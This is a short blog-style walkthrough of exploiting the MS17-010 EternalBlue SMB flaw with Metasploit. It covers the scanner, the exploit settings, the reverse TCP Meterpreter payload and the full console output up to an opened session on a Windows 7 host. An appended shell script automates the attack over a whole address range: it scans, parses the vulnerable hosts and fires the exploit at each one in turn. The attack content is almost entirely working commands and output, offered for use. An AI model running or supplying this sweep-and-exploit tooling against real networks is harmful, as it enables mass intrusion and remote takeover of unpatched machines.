Exploiting MS17-010 from MSF to compromise a Win7 host
2017-06-07 17:06
1. Check whether the target host is vulnerable:
msf > search ms17-010

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 good MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
// Searching for the keyword ms17-010 turns up two modules: the first checks whether the vulnerability is present, the second exploits it.
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.102 // set the target host IP address
rhosts => 192.168.1.102
msf auxiliary(smb_ms17_010) > run
[+] 192.168.1.102:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Home Basic 7601 Service Pack 1) // the vulnerability is present
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
2. Exploit the host
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp // use a reverse-connect (reverse TCP) Meterpreter payload
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > show options // list the module and payload options

Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST yes The target address
RPORT 445 yes The target port (TCP)
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.104 // set the local (attacker) host IP, where the handler listens
lhost => 192.168.1.104
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.102 // set the target host IP
rhost => 192.168.1.102
msf exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.104:4444
[*] 192.168.1.102:445 - Connecting to target for exploitation.
[+] 192.168.1.102:445 - Connection established for exploitation.
[+] 192.168.1.102:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.102:445 - CORE raw buffer dump (25 bytes)
[*] 192.168.1.102:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42 Windows 7 Home B
[*] 192.168.1.102:445 - 0x00000010 61 73 69 63 20 36 2e 31 00 asic 6.1
[+] 192.168.1.102:445 - Target arch selected valid for OS indicated by DCE/RPC reply
[*] 192.168.1.102:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.102:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.102:445 - Starting non-paged pool grooming
[+] 192.168.1.102:445 - Sending SMBv2 buffers
[+] 192.168.1.102:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.102:445 - Sending final SMBv2 buffers.
[*] 192.168.1.102:445 - Sending last fragment of exploit packet!
[*] 192.168.1.102:445 - Receiving response from exploit packet
[+] 192.168.1.102:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.102:445 - Sending egg to corrupted connection.
[*] 192.168.1.102:445 - Triggering free of corrupted buffer.
[*] Sending stage (1189423 bytes) to 192.168.1.102
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.102:49168) at 2017-06-07 15:23:51 +0800
[+] 192.168.1.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > // A Meterpreter session is now open. From this prompt many post-exploitation operations can be run against the target host. Note that the only target the module lists is x64 Windows 7 / Server 2008 R2; with VerifyTarget and VerifyArch left at true, the module checks the SMB and DCE/RPC replies (as in the output above) and will not fire against a host that does not match.
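The two steps above are typed interactively for a single host. As an added example that is not part of the original post, the shell script below drives the same two modules non-interactively through msfconsole -x, spools the console output to a file, and parses the scanner's result lines into a candidate list for the exploit. It assumes msfconsole is on PATH and that the scanner prints the "Host is likely VULNERABLE to MS17-010! (<OS>)" line exactly as shown above; the range, LHOST and log file name are placeholders, not values from the post.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post: run the two Metasploit
# modules used above non-interactively over a whole range, spool the console
# output, and parse the result lines into a host list.
# Assumptions (not stated in the post): msfconsole is on PATH, the scanner's
# "Host is likely VULNERABLE to MS17-010! (<OS>)" line looks as it does in the
# post, and the range/LHOST passed on the command line are placeholders.
set -eu

# Step 1 of the post, batched: auxiliary/scanner/smb/smb_ms17_010 over a CIDR
# or range. "color false" keeps ANSI escapes out of the spool file so it can
# be parsed; "exit -y" skips the confirmation prompt.
scan_ms17_010() {
    range=$1; spool=$2
    msfconsole -q -x "color false; spool ${spool}; use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS ${range}; set THREADS 16; run; spool off; exit -y"
}

# Pull "IP<TAB>OS string" out of every "likely VULNERABLE" line.
# Field 2 of such a line is "ip:445"; the OS string is inside the trailing parentheses.
vulnerable_hosts() {
    awk '
        /Host is likely VULNERABLE to MS17-010!/ {
            split($2, a, ":")
            os = $0
            sub(/^.*MS17-010! \(/, "", os)
            sub(/\)$/, "", os)
            print a[1] "\t" os
        }' "$1"
}

# Keep only hosts whose reported OS matches the single target the exploit
# module lists in the post (Windows 7 / Server 2008 R2). The scanner does not
# report the CPU architecture; the module's VerifyArch/VerifyTarget options
# (both true above) still abort at exploit time if the host is not x64.
eternalblue_candidates() {
    vulnerable_hosts "$1" | awk -F '\t' '$2 ~ /Windows 7|2008 R2/'
}

# Step 2 of the post for one host, with the same payload and options.
# "exploit -z" returns to the console instead of dropping into the session.
exploit_eternalblue() {
    rhost=$1; lhost=$2
    msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set RHOST ${rhost}; set LHOST ${lhost}; exploit -z; exit -y"
}

# Usage: ./ms17_010_sweep.sh 192.168.1.0/24 192.168.1.104
# (scan the range, list candidates, then exploit each one in turn)
if [ "$#" -ge 2 ]; then
    scan_ms17_010 "$1" ms17_010_scan.log
    eternalblue_candidates ms17_010_scan.log | while IFS="$(printf '\t')" read -r ip os; do
        echo "[*] ${ip} (${os}) -> running ms17_010_eternalblue"
        exploit_eternalblue "$ip" "$2"
    done
fi
```

The parsing functions work on any saved spool file, so the scan and the exploit step can be run at different times; only hosts that the scanner flagged and whose OS string matches the module's listed target are handed to exploit_eternalblue.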